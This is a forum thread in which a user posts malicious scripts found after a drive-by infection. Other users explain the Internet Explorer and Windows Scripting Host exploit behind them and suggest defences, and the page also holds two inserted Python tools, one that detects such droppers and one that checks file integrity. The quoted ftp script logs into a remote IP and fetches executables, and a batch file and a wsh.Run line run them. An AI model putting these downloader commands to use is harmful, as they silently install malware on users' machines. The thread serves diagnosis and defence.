Welcome to the JaguarPC Community

This is a discussion on Have you seen this? O ftp in the Open Discussion & Chit-chat forum

  1. #1
    v1.3 upgrade
    Join Date
    Apr 2004
    Location
    Texas...where else?
    Posts
    389

    Have you seen this? O ftp

    I was browsing what appeared to be a legitimate web site when my screen blacked out and blinked a few times.

    I suspended the modem immediately and began the search.

    Found several files but none detected by AV / Ad etc.

    First one:

    open 207.58.159.14
    tmpacct
    12345
    bin
    get newdevin.exe
    get TVM_B5.EXE
    get 06wu29rd.exe
    bye


    And the second one:

    if not exist C:\WINDOWSstatuslog ftp -s
    if exist newdevin.exe newdevin.exe
    if exist TVM_B5.EXE TVM_B5.EXE
    if exist 06wu29rd.exe 06wu29rd.exe


    I couldn't find any of the referenced files so I may have shut it down in time.

    I didn't find much on the web. Anyone seen the exe files before?

  2. #2
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Looks like it's a hijack script to me!

    Check your browser and see if it changed your homepage, search page, added any bookmarks, et cetera...
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

  3. #3
    || $name ne 'R.Stiltskin'
    Join Date
    Jun 2003
    Location
    Tejas
    Posts
    2,438

    Exclamation

    I've not observed or looked for these *.exe files before. But I'm not sure I understand the post.

    The stuff you posted looks like a couple of snippets of batch files. The first is a series of cmds to log in to a certain IP after providing a name/pwd, changing to binary, dload three *.exe, and log off. The second series seems to be a search.

    You are running MSIE? Do you have Windows Scripting Host enabled? Sounds like a cross-scripting exploit:

    Check out>
    Bugtraq: RE: Still Vulnerable in MSIE
    http://seclists.org/lists/bugtraq/2004/May/0153.html
    http://seclists.org/lists/bugtraq/2004/May/0177.html

    and then:
    Internet Explorer Object Data Remote Execution Vulnerability
    http://www.eeye.com/html/Research/Ad...D20030820.html

    You'll have to read the articles to understand the code, but your answer is there.

    It would appear that when you click on the evil url, you are redirected (in a hidden window, multiple times perhaps) to an evil IP addy and the WSH initiated, probably through ActiveX or JS.

    object.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
    Run method
    intWindowStyle - 6
    Description - Minimizes the specified window and activates the next top-level window in the Z order.

    So from our internet linked example (and some homework), we observe the following line among many lines:

    wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6);

    command /C 'string' - Carries out the command specified by string, and then stops.

    echo displays messages

    So you are receiving a series of "Run" commands from the OS Windows Scripting Host that say "open a scripting window, minimize(hide) it, write the string to the window and then pass it all to a *.bat file, and immediately return without halting or returning an error and give the focus to the top window. In essence, it's a sneaky way to write code to a batch file and run it underneath your field of view, probably while you browse.

    The completed batch file is then a series of commands to surreptitiously log you in to a cracker's site, download some binary files, and log you off. It checks to see if an ftp statuslog is being created and if it isn't, then it runs ftp again and uses the commands in the batch file it just created to run the newly downloaded files.

    What you could be looking for are newly created batch files that look suspicious... see if an incomplete one exists and is waiting to get finished. Pretty damn sneaky. And another reason to harden your browser and use the Proxomitron (or other local web proxy).
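The two-file pattern described above (an ftp -s command file that logs in and fetches executables, plus a batch file that drives ftp and launches whatever arrived) is regular enough to flag mechanically. The following detector is an added example, not code from the thread; its sample files are constructed, with a TEST-NET placeholder host and made-up file names.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed samples shaped like the two snippets in the thread; the host (a
# TEST-NET-1 address) and the file names are placeholders, not real indicators.
FTP_SCRIPT = "open 192.0.2.10\ntmpacct\n12345\nbin\nget dropper1.exe\nget dropper2.EXE\nbye\n"
BATCH_FILE = ("if not exist C:\\WINDOWS\\statuslog ftp -s:o\n"
              "if exist dropper1.exe dropper1.exe\nif exist dropper2.EXE dropper2.EXE\n")

EXE_RE = re.compile(r"\.(exe|com|scr|bat|cmd|pif)$", re.IGNORECASE)

@dataclass
class Finding:
    host: Optional[str] = None                           # target of an `open` line
    downloads: List[str] = field(default_factory=list)   # executables fetched via get/mget/recv
    executes: List[str] = field(default_factory=list)    # `if exist X X` self-launch lines
    drives_ftp: bool = False                             # the batch invokes `ftp -s:<file>`

    @property
    def suspicious(self) -> bool:
        """A login script that pulls executables, or a batch that runs ftp -s then launches the result."""
        return bool(self.host and self.downloads) or bool(self.drives_ftp and self.executes)

def classify_ftp_script(text: str) -> Finding:
    """Parse an `ftp -s:` command file: record the host and any executables it fetches."""
    f = Finding()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:          # bare user/password/bin/bye lines carry no argument
            continue
        cmd = parts[0].lower()
        if cmd == "open":
            f.host = parts[1]
        elif cmd in ("get", "mget", "recv") and EXE_RE.search(parts[1]):
            f.downloads.append(parts[1])
    return f

def classify_batch(text: str) -> Finding:
    """Scan a batch file for `ftp -s` plus `if exist X X` lines that launch what was downloaded."""
    f = Finding()
    for line in text.splitlines():
        if re.search(r"\bftp\s+-s", line, re.IGNORECASE):
            f.drives_ftp = True
        m = re.match(r"\s*if\s+exist\s+(\S+)\s+(\S+)\s*$", line, re.IGNORECASE)
        if m and m.group(1).lower() == m.group(2).lower() and EXE_RE.search(m.group(1)):
            f.executes.append(m.group(1))
    return f
```

Run both classifiers over small text files found in the user profile or system directories and review anything where `suspicious` is true; a half-written ftp script with `open` and `get` lines but no `bye` yet is exactly the "incomplete one waiting to get finished" case.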

  4. #4
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Those damn hijackers usually load a batch file on your machine, place a shortcut on your desktop, then execute it automatically from there without asking.

    It happened to my wife all the time, 'cause she uses Internet Explorer. I'd ask, "Hey, why are you running MSN for a portal (or whatever)?" She'd say, "I thought you did it, so I left it alone."

    After about the 10th time, I installed Spybot S&D Residence, and it started catching those things in the act, trying to change the registry and so forth.

    This ALWAYS happens on otherwise reputable sites too, I might add...

  5. #5
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Here's a snap of the interface...

  7. #7
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Heh! Here's your IP...

    http://207.58.159.14/

  9. #9
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    I like this advice from the link above...
    To stop from being hijacked, just switch from IE (which is terribly insecure, and requires patches all the time to fix vulnerabilities) to Mozilla.

    Mozilla will not allow the homepage to be switched by hijackers, plus it has more features than IE, and is more secure.

    Or, you can download mozilla firefox, which is faster and has most security features enabled by default.

  10. #10
    v1.3 upgrade
    Join Date
    Apr 2004
    Location
    Texas...where else?
    Posts
    389
    I searched the site last night and cleaned my pc this morning but was curious about the individual files uploaded to my pc.

    I use IE, NS, and Firefox for cross-browser testing of web content and I do have the evil JS enabled for that purpose. I am currently working on a php site with content selection based on availability of JS/Flash on the client machine. The static site has auto-sizing to get rid of all the blank space and the Flash site is full-screen.

    I have already tweaked the forum to full-size within Flash and made the necessary link changes but I have been too busy to work on it lately.

    I am using Norton FW and AV on this machine plus a router firewall, Spysweeper, and AdAware.

    At my office I installed AVG/ZoneAlarm/Spysweeper/Adaware and have had NO problems in almost a year. But then again, I do much more work at home.

    It just pisses me off that I have to waste time on security and cleaning out the junk that gets in.

  11. #11
    v1.3 upgrade
    Join Date
    Apr 2004
    Location
    Texas...where else?
    Posts
    389
    Oh yeah, I WILL restrict my IE use for testing purposes from now on.

    Anyone have or know of a simple way to log ALL file changes and port activity? I have the power and the space but not the time.

  12. #12
    || $name ne 'R.Stiltskin'
    Join Date
    Jun 2003
    Location
    Tejas
    Posts
    2,438
    Quote Originally Posted by Jaded
    It just pisses me off that I have to waste time on security and cleaning out the junk that gets in.
    Welcome to the wonderful world of sysadmin.

    The filenames are quite inconsequential. They can be named anything since the exploit, as it would appear, requires only that the batchfile list and the actual binary names match. From the background I read, many of the binaries are ad related... but who knows what ultimately the function of those binaries are.

    Another sinister component is that the cracker can rename the files at will which makes it harder to detect by AV/Ad removal software. The security software must learn the pattern of exploit rather than really detect the individual files by name since they are such a dynamic feature of the exploit.

    This really is a sneaky trick. Leave it to some [numerous descriptive expletives deleted] crackers to destroy a potentially useful tool of scripting.

    Anyone know the mechanism for reporting sites that do this? Apparently, MS is suing a company that used this trick to redirect some customers. I'd pass names to MS and anyone else that would listen if I ran across the exploit directly.

  13. #13
    || $name ne 'R.Stiltskin'
    Join Date
    Jun 2003
    Location
    Tejas
    Posts
    2,438
    Quote Originally Posted by Vin DSL
    This ALWAYS happens on otherwise reputable sites too, I might add...
    You might need to redefine reputable.

    Can you provide an example site? I'd be curious to see a "live" one.

  14. #14
    Yeah, I know a LOT! Vin DSL's Avatar
    Join Date
    Mar 2003
    Location
    Arizona Uplands
    Posts
    10,775
    Quote Originally Posted by Spathiphyllum
    You might need to redefine reputable.

    Can you provide an example site? I'd be curious to see a "live" one.
    Next time I run across one, I'll post here.

    BTW, here's a nice, simple tutorial on how to protect yourself against this sort of nonsense, and/or how to deal with it once it happens.

    http://www.pcstats.com/articleview.c...id=1579&page=1

    This article hits all the high points - exactly what I would have written, had I been doing it...

  15. #15
    || $name ne 'R.Stiltskin'
    Join Date
    Jun 2003
    Location
    Tejas
    Posts
    2,438
    Quote Originally Posted by Jaded
    Anyone have or know of a simple way to log ALL file changes and port activity?...
    Logging all port activity could use up resources quick; I relegate that task to a dedicated firewall since it is the best balance of alarm and report for my network. Any more analysis would be too extensive since I'm not running the NSA here.

    As far as file changes, you could do a search for the equivalent version of linux OS "tripwire". It's a useful utility to do the exact task you want. I'll use one on the firewall but don't typically run one on other systems except when setting up a honeypot. I'm guessing there's a Windows OS equivalent.
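On the file-change side, the tripwire idea above reduces to hashing a baseline and diffing it later. This is an added example in Python (not from the thread or from tripwire itself), with a constructed scenario that drops a new .bat file and edits an existing file under a temporary directory.

```python
import hashlib, json, tempfile
from pathlib import Path
from typing import Dict, List

Baseline = Dict[str, Dict[str, object]]

def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root: str) -> Baseline:
    """Walk `root` and record hash, size and mtime of every regular file, keyed by relative path."""
    root_path, base = Path(root), {}
    for p in sorted(root_path.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            base[p.relative_to(root_path).as_posix()] = {
                "sha256": _sha256(p), "size": st.st_size, "mtime": int(st.st_mtime)}
    return base

def save_baseline(base: Baseline, path) -> None:
    Path(path).write_text(json.dumps(base, indent=1, sort_keys=True))

def load_baseline(path) -> Baseline:
    return json.loads(Path(path).read_text())

def diff_baselines(old: Baseline, new: Baseline) -> Dict[str, List[str]]:
    """Files added, removed, or whose content hash changed since the stored baseline."""
    common = set(old) & set(new)
    return {"added": sorted(set(new) - set(old)),
            "removed": sorted(set(old) - set(new)),
            "modified": sorted(k for k in common if old[k]["sha256"] != new[k]["sha256"])}

def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a directory, then drop a .bat and alter an existing file."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d) / "watched"
        root.mkdir()
        (root / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "readme.txt").write_text("unchanged\n")
        save_baseline(build_baseline(str(root)), Path(d) / "baseline.json")
        (root / "o.bat").write_text("ftp -s:o\n")                                   # newly dropped
        (root / "hosts").write_text("127.0.0.1 localhost\n0.0.0.0 example.test\n")  # edited in place
        return diff_baselines(load_baseline(Path(d) / "baseline.json"), build_baseline(str(root)))

if __name__ == "__main__":
    print(demo())
```

Keep the baseline file somewhere the watched tree cannot write to (removable media or another host), since a baseline stored beside the files it protects can be rewritten by the same code that changes them.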
